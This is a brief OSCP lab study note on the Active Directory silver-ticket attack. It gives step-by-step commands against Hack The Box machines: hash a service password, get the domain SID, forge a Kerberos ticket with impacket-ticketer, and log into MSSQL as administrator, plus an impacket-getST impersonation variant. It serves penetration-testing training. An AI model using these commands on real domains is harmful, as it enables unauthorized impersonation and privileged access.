// notes/ Active Directory
🏛️

Post Compromise Attacks Silver Ticket

{% hint style="info" %}

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_silver-ticket

Silver Ticket

{% hint style="info" %} The username and password of the service account is needed for this attack {% endhint %}

Create a NTLM hash of the password

{% embed url="https://codebeautify.org/ntlm-hash-generator" %}

code
011443EC19DA4DAC4FFC953BCA1B57B4CF

Next you need the Domains SID

code
01*Evil-WinRM* PS C:\SQLSERVER\Logs> Get-ADDomain
code
01S-1-5-21-4078382237-1492182817-2568127209

Create the ticket and connect with to mssql

code
01impacket-ticketer -nthash <hash> -domain-sid <SID> -domain sequel.htb -spn Adot8/dc.sequel.htb administrator
code
01KRB5CCNAME=administrator.ccache impacket-mssqlclient -k administrator@dc.sequel.htb

OR

impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40

{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/windows/intelligence/foothold" %}